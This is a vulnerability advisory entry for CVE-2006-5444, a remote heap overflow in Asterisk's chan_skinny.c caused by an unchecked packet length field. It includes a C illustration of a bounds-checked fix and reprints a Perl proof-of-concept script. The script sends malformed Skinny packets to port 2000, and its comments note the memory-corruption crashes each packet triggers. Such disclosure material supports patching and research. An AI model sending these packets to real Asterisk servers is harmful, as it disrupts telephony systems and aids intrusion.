Asterisk 'chan_skinny.c' Remote Buffer Overflow Vulnerability

Vulnerability ID: 1111335    Vulnerability type: Buffer overflow
Published: 2006-10-19    Updated: 2007-01-15
CVE: CVE-2006-5444    CNNVD-ID: CNNVD-200610-381
Platform: Multiple    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2597
https://www.securityfocus.com/bid/20617
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-381
|Vulnerability details
Asterisk is PBX software that runs on Linux and supports IP telephony over the SIP, IAX and H.323 protocols. The function static int get_input(struct skinnysession *s) in Asterisk's chan_skinny.c does not properly validate the user-supplied length field in the packet header. A remote attacker can send a specially crafted packet to trigger a buffer overflow, leading to execution of arbitrary instructions.
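The missing check described above, written out as an added illustration (this is not Asterisk's code or the vendor's fix): a length-validated copy of one Skinny message. The 1000-byte buffer size and the 8-byte header layout (4-byte little-endian length plus 4 reserved bytes) are assumptions taken from the PoC and its crash trace.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed sizes for illustration only; a real fix uses the actual buffer sizes. */
#define SKINNY_INBUF_SIZE 1000u
#define SKINNY_HDR_LEN    8u   /* 4-byte little-endian length + 4-byte reserved word */

/* Read the length field byte by byte (the original used letohl(*(int*)buf)). */
static uint32_t skinny_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy one Skinny message from inbuf (avail bytes received so far) into req.
 * Returns the number of bytes copied, or 0 when the header's length field is
 * inconsistent with the data received or with the size of req. */
size_t skinny_copy_message(const unsigned char *inbuf, size_t avail,
                           unsigned char *req, size_t req_size)
{
    if (avail < SKINNY_HDR_LEN)
        return 0;                         /* not even a complete header */
    uint32_t body_len = skinny_le32(inbuf);
    /* Bound the raw field before adding the header size: 0xFFFFFFF0 is -16 as
     * a signed int, so the original's "len + 8" became -8 and memcpy was
     * handed an enormous size_t. Checking first also rules out wrap-around. */
    if (body_len > SKINNY_INBUF_SIZE - SKINNY_HDR_LEN)
        return 0;
    size_t total = (size_t)body_len + SKINNY_HDR_LEN;
    if (total > avail || total > req_size)
        return 0;                         /* claims more than was received or fits */
    memcpy(req, inbuf, total);
    return total;
}

int main(void)
{
    /* Constructed sample: header claims a 12-byte body, 20 bytes on the wire. */
    unsigned char wire[20] = { 0x0C, 0x00, 0x00, 0x00, 0, 0, 0, 0 };
    unsigned char req[SKINNY_INBUF_SIZE];
    printf("well-formed: %zu bytes\n", skinny_copy_message(wire, sizeof wire, req, sizeof req));
    wire[0] = 0xF0; wire[1] = wire[2] = wire[3] = 0xFF;   /* length field from the PoC */
    printf("bogus length: %zu bytes\n", skinny_copy_message(wire, sizeof wire, req, sizeof req));
    return 0;
}
```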
|Vulnerability EXP
#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept causes chan_skinny to crash in different locations and due to
# memory corruption as well as double free calls, this is based on the finding of
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
#

use IO::Socket;
use strict;

my $target = "127.0.0.1";

# Skinny (SCCP) listens on TCP port 2000
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");

unless ($remote) { die "cannot connect to skinny daemon on $target" }

# Each assignment below is one test case; only the last one is actually sent.
# The first four bytes are the little-endian length field that get_input() trusts.
my $packet;
$packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
$packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
$packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
$packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
#[Switching to Thread -1494127696 (LWP 9909)]
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);

print $remote $packet;

# milw0rm.com [2006-10-19]
|Affected products
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S
|References

Source: VU#521252
Name: VU#521252
Link: http://www.kb.cert.org/vuls/id/521252
Source: BID
Name: 20617
Link: http://www.securityfocus.com/bid/20617
Source: BUGTRAQ
Name: 20061018 Security-Assessment.com Advisory: Asterisk remote heap overflow
Link: http://www.securityfocus.com/archive/1/archive/1/449127/100/0/threaded
Source: VUPEN
Name: ADV-2006-4097
Link: http://www.frsirt.com/english/advisories/2006/4097
Source: www.asterisk.org
Link: http://www.asterisk.org/node/109
Source: SECTRACK
Name: 1017089
Link: http://securitytracker.com/id?1017089
Source: SECUNIA
Name: 22480
Link: http://secunia.com/advisories/22480
Source: ftp.digium.com
Link: http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13
Source: ftp.digium.com
Link: http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12
Source: OPENPKG
Name: OpenPKG-SA-2006.024
Link: http://www.securityfocus.com/archive/1/archive/1/449183/100/0/threaded
Source: XF
Name: asterisk-getinput-code-execution(29663)
Link: http://xforce.iss.net/xforce/xfdb/29663
Source: DEBIAN
Name: DSA-1229
Link: http://www.us.debian.org/security/2006/dsa-1229
Source: OSVDB
Name: 29972
Link: ht